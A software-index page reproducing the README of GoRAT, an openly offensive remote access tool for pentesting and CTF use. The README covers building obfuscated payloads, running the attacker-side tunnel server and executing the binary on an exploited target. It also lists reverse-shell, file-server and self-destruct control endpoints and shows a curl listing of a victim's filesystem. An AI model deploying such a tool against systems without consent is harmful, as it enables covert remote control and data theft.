Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/justintimperio/gorat

GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.
https://github.com/justintimperio/gorat

android arm arm64 ctf file-server freebsd golang https linux macos mips openbsd pentesting reverse-shell windows x86

Last synced: 1 day ago
JSON representation

GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.

Host: GitHub
URL: https://github.com/justintimperio/gorat
Owner: JustinTimperio
License: mit
Created: 2021-06-25T02:57:20.000Z (over 3 years ago)
Default Branch: master
Last Pushed: 2022-01-03T17:55:16.000Z (over 2 years ago)
Last Synced: 2024-09-26T13:22:20.753Z (1 day ago)
Topics: android, arm, arm64, ctf, file-server, freebsd, golang, https, linux, macos, mips, openbsd, pentesting, reverse-shell, windows, x86
Language: Go
Homepage:
Size: 6.06 MB
Stars: 59
Watchers: 5
Forks: 15
Open Issues: 1
Metadata Files:
- Readme: README.MD
- License: LICENSE

Awesome Lists containing this project

README

        ```

 @@@@@@@@   @@@@@@   @@@@@@@    @@@@@@   @@@@@@@  

@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@  

!@@        @@!  @@@  @@!  @@@  @@!  @@@    @@!    

!@!        !@!  @!@  !@!  @!@  !@!  @!@    !@!    

!@! @!@!@  @!@  !@!  @!@!!@!   @!@!@!@!    @!!    

!!! !!@!!  !@!  !!!  !!@!@!    !!!@!!!!    !!!    

:!!   !!:  !!:  !!!  !!: :!!   !!:  !!!    !!:    

:!:   !::  :!:  !:!  :!:  !:!  :!:  !:!    :!:    

 ::: ::::  ::::: ::  ::   :::  ::   :::     ::    

 :: :: :    : :  :    :   : :   :   : :     :     

```

![GitHub](https://img.shields.io/github/license/JustinTimperio/GoRAT)

[![Go Reference](https://pkg.go.dev/badge/github.com/JustinTimperio/GoRAT.svg)](https://pkg.go.dev/github.com/JustinTimperio/GoRAT)

![Go Report Card](https://goreportcard.com/badge/github.com/JustinTimperio/GoRAT)

[![Codacy Badge](https://app.codacy.com/project/badge/Grade/d343e4d027164076a630448e3102fbf7)](https://www.codacy.com/gh/JustinTimperio/GoRAT/dashboard?utm_source=github.com&utm_medium=referral&utm_content=JustinTimperio/GoRAT&utm_campaign=Badge_Grade)

GoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and designed for CTF players, Go enthusiasts, and security experts.)

### Supported Distros:

| 64Bit Distros       | 32Bit Distros                 |

|---------------------|-------------------------------|

| Linux               | Linux                         |

| FreeBSD             | FreeBSD                       |

| OpenBSD             | OpenBSD                       |

| Linux ARM           | Linux ARM                     |

| FreeBSD ARM         | FreeBSD ARM                   |

| OpenBSD ARM         | OpenBSD ARM                   |

| Linux MIPS          | Linux MIPS                    |

| MacOS               | (NOT BUILDING) MacOS          |

| Android ARM         | (NOT BUILDING) Android ARM    |

| Windows (kinda)     | Windows (kinda)               |

# Installing and Building Native

1. Set up a full GoLang build environment

2. Install [UPX](https://upx.github.io/) 

3. Install [Garble](https://github.com/burrowers/garble) with `go get mvdan.cc/garble`

4. Fill out `config.sh`

5. Run `./build_payload.sh --all`

# Installing and Building with Docker

1. Install and start docker

2. Fill out `config.sh` 

3. Run `./build_payload.sh --docker`

# Using the Payloads

1. Transfer the `BUILD` folder to your "attacking" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh`

2. Exploit your system and run the binary

3. Connect to the "target" via normal ssh from the "attacking" machine

# Chisel Server Usage

GoRAT uses the standard release binaries provided by the [chisel project](https://github.com/jpillora/chisel/releases). The server requires a number of configure options and has fairly verbose logging. For this reason a small shell script is provided to start and parse the output of chisel for easy use. To use it, run the following:

1. `cd server` 

2. `./start_server.sh` 

As clients connect you will see a log like this. We will use this log to access each clients SSH Server, HTTP File Server, and HTTP Control Server.

```

mr.robot@localhost:~# ./start_server.sh 

Starting Chisel Server on Port 1337

=============================================

Session #1 | Control Server Mounted On: 27818

Session #1 | SSH Server Mounted On: 27819

=============================================

Session #2 | Control Server Mounted On: 33132

Session #2 | SSH Server Mounted On: 33133

```

# Payload Usage

As with many Go binaries, client executables require zero configure and simply need to be executed. In its current state GoRAT does not include any methods of persistence so if you would like to make it a service, you will need to do so by your own methods.

The payload also uses [garble](https://github.com/burrowers/garble) to produce a binary that works as well as a regular build, but has as little information about the original source code as possible.

## SSH Server (Linux, FreeBSD, Darwin, OpenBSD)

Using the logs we can connect to clients directly via ssh using our standard unix OpenSSH package.

```

ssh localhost -p ####

```

## WSSH Windows (The Problem Child)

*WARNING THE WINDOWS SHELL IS TERRIBLE, THIS WAS JUST AN EXPERIMENT*

Please check out this thread: https://github.com/creack/pty/pull/109#issuecomment-864673714

When connecting to Windows hosts the following command will not work as GoRAT does not have a Windows PTY. For Windows systems we connect using a custom wrapper written for GoRAT.

```

cd wssh

go build wssh.go

./wssh.go

```

## Control Server

The control server is a simple http mechanism that translates `/some-page` to internal go commands. In this way, requesting a webpage results directly in the execution of code on a client system. While this mechanism is not very sophisticated, it is extremely reliable and performant. The api current has the following commands:

1. `http://localhost:port/` - Returns a status code of `OK` if the host is online and responding to requests

2. `http://localhost:port/hardware` - Reports basic hardware survey of device in json 

3. `http://localhost:port/stop` - Closes the client payload WITHOUT self-destruction

4. `http://localhost:port/uninstall` - Terminates the client payload AND self-destructs

## File Server

Each client's file server can be accessed on the same port as the control server. The file server is, from a technical standpoint, directly part of Control Server. Files and directories can be accessed at `http://localhost:####/fs/` through your browser or tools like `wget` and `curl`.

```

[robot@localhost ~]$ curl localhost:14963/fs/


bin

boot/

dev/

etc/

home/

keybase/

lib

lib64

lost+found/

mnt/

opt/

proc/

root/

run/

sbin

srv/

sys/

test/

tmp/

usr/

var/



```

# Architecture

GoRAT uses [chisel](https://github.com/jpillora/chisel) and [gliderlabs ssh server](https://github.com/gliderlabs/ssh) to create a high performance remote reverse tunnel over HTTPS. The diagram below shows how GoRAT establishes a link between multiple “targets” and a single “attacker”. 

![image](goRAT_Architecture.jpg)

# Disclaimer

Use of GoRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. We assume no liability and are not responsible for any misuse or damage caused by this software. Only use for educational purposes / ethical hacking. Multiple tools in this software include their own license.